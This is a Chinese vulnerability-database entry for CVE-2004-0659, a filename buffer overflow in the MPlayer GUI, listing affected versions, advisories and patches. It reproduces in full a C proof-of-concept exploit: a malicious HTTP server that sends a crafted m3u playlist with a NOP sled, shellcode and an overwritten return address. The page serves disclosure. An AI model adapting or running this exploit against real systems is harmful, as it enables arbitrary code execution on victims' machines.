CVE-2004-0659
CVSS10.0
发布时间 :2004-08-06 00:00:00
修订时间 :2016-10-17 22:47:18
NMCOES    

[原文]Buffer overflow in TranslateFilename for common.c in MPlayer 1.0pre4 allows remote attackers to execute arbitrary code via a long file name.


[CNNVD]MPlayer GUI文件名缓冲区溢出漏洞(CNNVD-200408-073)

        
        MPlayer是一款基于Linux的电影播放程序。
        基于GUI的MPlayer对外部提供的文件名长度缺少充分检查,远程攻击者可以利用这个漏洞对MPlayer进行缓冲区溢出攻击,可能以用户进程权限执行任意指令。
        构建恶意文件,诱使使用GUI的MPlayer处理,当应用程序拷贝字符串到缓冲区时,可导致溢出,精心构建提交数据可能以用户进程权限执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:mplayer:mplayer:head_cvs
cpe:/a:mplayer:mplayer:0.92.1
cpe:/a:mplayer:mplayer:0.92_cvs
cpe:/a:mplayer:mplayer:0.90_pre
cpe:/a:mplayer:mplayer:0.90_rc4
cpe:/a:mplayer:mplayer:0.90_rc
cpe:/a:mplayer:mplayer:1.0_pre4
cpe:/a:mplayer:mplayer:1.0_pre3
cpe:/a:mplayer:mplayer:0.90
cpe:/a:mplayer:mplayer:1.0_pre2
cpe:/a:mplayer:mplayer:1.0_pre1
cpe:/a:mplayer:mplayer:0.92
cpe:/a:mplayer:mplayer:0.91
cpe:/a:mplayer:mplayer:1.0_pre3try2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0659
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0659
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-073
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=108844316930791&w=2
(UNKNOWN)  BUGTRAQ  20040627 MPlayer MeMPlayer.c
http://www.gentoo.org/security/en/glsa/glsa-200408-01.xml
(UNKNOWN)  GENTOO  GLSA-200408-01
http://www.securityfocus.com/bid/10615
(VENDOR_ADVISORY)  BID  10615
http://xforce.iss.net/xforce/xfdb/16532
(VENDOR_ADVISORY)  XF  mplayer-common-bo(16532)

- 漏洞信息

MPlayer GUI文件名缓冲区溢出漏洞
危急 边界条件错误
2004-08-06 00:00:00 2005-10-20 00:00:00
远程  
        
        MPlayer是一款基于Linux的电影播放程序。
        基于GUI的MPlayer对外部提供的文件名长度缺少充分检查,远程攻击者可以利用这个漏洞对MPlayer进行缓冲区溢出攻击,可能以用户进程权限执行任意指令。
        构建恶意文件,诱使使用GUI的MPlayer处理,当应用程序拷贝字符串到缓冲区时,可导致溢出,精心构建提交数据可能以用户进程权限执行任意指令。
        

- 公告与补丁

        厂商补丁:
        MPlayer
        -------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.mplayerhq.hu/homepage/design6/news.html

- 漏洞信息 (308)

MPlayer <= 1.0pre4 GUI filename handling Overflow Exploit (EDBID:308)
linux remote
2004-07-04 Verified
0 c0ntex
N/A [点击下载]
/*
  c0ntex open-security org
   
 */

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>


#define SUCCESS 0 /* True */
#define FAILURE 1 /* False */


#define A_BANNER "_MPlayer_MeMPlayer_Media_Mayhem_"
#define ALIGN 0 /* Stack address alignment */
#define BUFFER 544 /* Exactly overwrite EIP */
#define EIPWRT 4 /* Byte count for overwrite */
#define NOP 0x90 /* NoOp padding */
#define OFFSET 0 /* Offset from retaddr */
#define PORT 80 /* Listener port */
#define RETADDR 0xbfffcb9c /* Remote return address */
#define THREAT "MPlayer/1.0pre4-3.2.2" /* Latest vulnerable version */


#define example(OhNoo) fprintf(stderr, "Usage: ./memplayer -a <align_val> -o <offset_val>\n\n",
OhNoo);
#define looking(OhYes)  fprintf(stderr, "I'm looking for projects to work on, mail
me if you have something\n\n", OhYes);


unsigned int i;
char payload[BUFFER];

void banner(void);
void die(char *ohnn);

int pkg_prep(int clisock_fd, int align, int offset);
int pkg_send(int clisock_fd, char *payload);
int main(int argc, char **argv);


char *http[] = {
        "HTTP/1.0 200 OK\r\n",
"Date: Thu, 01 Jun 2004 12:52:15 GMT\r\n",
"Server: MemPlayer/1.0.3 (Linux)\r\n",
"MIME-version: 1.0\r\n",
"Content-Type: audio/x-mpegurl\r\n",
"Content-Length: 666\r\n",
"Connection: close\r\n",
"\r\n"
};


char *m3umuxor[] = {
        "\x23\x45\x58\x54\x4D\x33\x55\r\n",
        "\x23\x45\x58\x54\x49\x4E\x46\x3A"
        "\x2E\x2c\x4F\x70\x65\x6E\x2D\x53"
        "\x65\x63\x75\x72\x69\x74\x79\x2E"
        "\x52\x6F\x63\x6B\x73\r\n",
        "\r\n"
};


char opcode[] = {
0x31,0xc0,0x89,0xc3,0xb0,0x17,0xcd,0x80,0x31,0xc0,0x89,0xc3,
0xb0,0x24,0xcd,0x80,0x31,0xc0,0x89,0xc3,0xb0,0x24,0xcd,0x80,
0x31,0xc0,0x89,0xc3,0x89,0xc1,0x89,0xc2,0xb0,0x58,0xbb,0xad,
0xde,0xe1,0xfe,0xb9,0x69,0x19,0x12,0x28,0xba,0x67,0x45,0x23,
0x01,0xcd,0x80,0x31,0xc0,0x89,0xc3,0xfe,0xc0,0xcd,0x80
};


void
banner(void)
{
fprintf(stderr, "\n  ** MPlayer_Memplayer.c - Remote exploit demo POC **\n\n");
fprintf(stderr, "[-] Uses m3u header reference to make MPlayer think it has a\n");
fprintf(stderr, "[-] valid media file then crafted package is sent, overflows\n");
fprintf(stderr, "[-] the guiIntfStruct.Filename buffer && proves exploit POC.\n");
fprintf(stderr, "[-] c0ntex open-security org {} http://www.open-security.org  \n\n");
}


void
die(char *err_trap)
{
perror(err_trap);
fflush(stderr); _exit(1);
}


int
pkg_prep(int clisock_fd, int align, int offset)
{
unsigned int recv_chk;
long retaddr;

char chk_vuln[69];
char *pload = (char *) &opcode;


retaddr = RETADDR - offset;

fprintf(stderr, " -> Using align [%d] and offset [%d]\n", align, offset);

memset(chk_vuln, 0, sizeof(chk_vuln));

recv_chk = recv(clisock_fd, chk_vuln, sizeof(chk_vuln) -1, 0);
chk_vuln[recv_chk+1] = '\0';

if(recv_chk == -1 || recv_chk == 0) {
fprintf(stderr, "Could not receive data from client\n");
}

if(strstr(chk_vuln, THREAT) || strstr(chk_vuln, "MPlayer/0")) {
fprintf(stderr, " -> Detected vulnerable MPlayer version\n");
}else{
fprintf(stderr, " -> Detected a non-MPlayer connection, end.\n");
close(clisock_fd);
_exit(1);
}

fprintf(stderr, " -> Payload size to send is [%d]\n", sizeof(payload));
fprintf(stderr, " -> Sending evil payload to our client\n");

memset(payload, 0, BUFFER);

for(i = (BUFFER - EIPWRT); i < BUFFER; i += 4)
               *(long *)&payload[i] = retaddr;

for (i = 0; i < (BUFFER - sizeof(opcode) - 4); ++i)
                *(payload + i) = NOP;

        memcpy(payload + i, pload, strlen(pload));

        payload[545] = 0x00;

return SUCCESS;
}


int
pkg_send(int clisock_fd, char *payload)
{

for (i = 0; i < 8; i++)
if(send(clisock_fd, http[i], strlen(http[i]), 0) == -1) {
die("Could not send HTTP header");
}fprintf(stderr, "\t- Sending valid HTTP header..\n"); sleep(1);

for (i = 0; i < 3; i++)
if(send(clisock_fd, m3umuxor[i], strlen(m3umuxor[i]), 0) == -1) {
die("Could not send m3u header");
       }fprintf(stderr, "\t- Sending valid m3u header..\n"); sleep(1);

if(send(clisock_fd, payload, strlen(payload), 0) == -1) {
die("Could not send payload");
}fprintf(stderr, "\t- Sending payload package..\n");

return SUCCESS;
}


int
main(int argc, char **argv)
{
unsigned int align = 0, offset = 0, reuse = 1;
unsigned int port = PORT;
unsigned int cl_buf, opts;

signed int clisock_fd, sock_fd;

static char *exploit, *work;

struct sockaddr_in victim;
struct sockaddr_in confess;


if(argc < 2) {
banner();
example(exploit);
_exit(1);
}banner();


while((opts = getopt(argc, argv, "a:o:")) != -1) {
switch(opts)
{
case 'a':
align = atoi(optarg);
break;
case 'o':
offset = atoi(optarg);
break;
default:
align = ALIGN;
offset = OFFSET;
}
}

if((sock_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
die("Could not create socket");
}

if(setsockopt(sock_fd,SOL_SOCKET,SO_REUSEADDR, &reuse, sizeof(int)) == -1) {
die("Could not re-use socket");
}

memset(&confess, 0, sizeof(confess));

confess.sin_family = AF_INET;
confess.sin_port = htons(port);
confess.sin_addr.s_addr = htonl(INADDR_ANY);

if(bind(sock_fd, (struct sockaddr *)&confess, sizeof(struct sockaddr)) == -1) {
die("Could not bind socket");
}

if(listen(sock_fd, 0) == -1) {
die("Could not listen on socket");
}

printf(" -> Listening for a connection on port %d\n", port);

cl_buf = sizeof(victim);
clisock_fd = accept(sock_fd, (struct sockaddr *)&victim, &cl_buf);

fprintf(stderr, " -> Action: Attaching from host[%s]\n", inet_ntoa(victim.sin_addr));

if(pkg_prep(clisock_fd, align, offset) == 1) {
fprintf(stderr, "Could not prep package\n");
_exit(1);
}

if(pkg_send(clisock_fd, payload) == 1) {
fprintf(stderr, "Could not send package\n");
_exit(1);
}
sleep(2);

fprintf(stderr, " -> Test complete\n\n");

close(clisock_fd); looking(work);

return SUCCESS;
}


// milw0rm.com [2004-07-04]
		

- 漏洞信息

7282
MPlayer GUI TranslateFilename Overflow
Local Access Required, Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

An overflow exists in the TranslateFilename function in Gui/mplayer/common.c of MPlayer. MPlayer fails to verify the lengh of the guiIntfStruct.Filename variable resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.

- 时间线

2004-06-27 Unknow
2004-06-27 Unknow

- 解决方案

Upgrade to version in cvs, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: apply the patch in the original advisory or recompile MPlayer without GUI support.

- 相关参考

- 漏洞作者

- 漏洞信息

MPlayer GUI File Name Buffer Overflow Vulnerability
Boundary Condition Error 10615
Yes No
2004-06-28 12:00:00 2009-07-12 05:16:00
Discovery of this issue is credited to c0ntex <c0ntex@open-security.org>.

- 受影响的程序版本

MPlayer MPlayer 1.0 pre4
MPlayer MPlayer 1.0 pre3try2
MPlayer MPlayer 1.0 pre3
MPlayer MPlayer 1.0 pre2
MPlayer MPlayer 1.0 pre1
MPlayer MPlayer 0.92.1
MPlayer MPlayer 0.92
MPlayer MPlayer 0.91
+ Mandriva Linux Mandrake 9.2
MPlayer MPlayer 0.90 rc series
MPlayer MPlayer 0.90 pre series
MPlayer MPlayer 0.90
MPlayer MPlayer 0.9 0rc4
+ Mandriva Linux Mandrake 9.1
MPlayer MPlayer HEAD CVS
MPlayer MPlayer 0_92 CVS

- 漏洞讨论

It has been reported that MPlayer when used with the graphical user interface (GUI) is affected by a buffer overflow vulnerability. This issue is due to a failure of the application to properly handle user-supplied strings when copying them into finite buffers.

Successful exploitation would immediately produce a denial of service condition in the affected process. This issue may also be leveraged to execute code on the affected system within the security context of the user running the vulnerable process.

- 漏洞利用

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com &lt;mailto:vuldb@securityfocus.com&gt;.

- 解决方案

Gentoo has released advisory GLSA 200408-01 dealing with this issue. All MPlayer users should upgrade to the latest version:

# emerge sync

# emerge -pv ">=media-video/mplayer-1.0_pre4-r7"
# emerge ">=media-video/mplayer-1.0_pre4-r7"

For more information please see the referenced vendor advisory.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站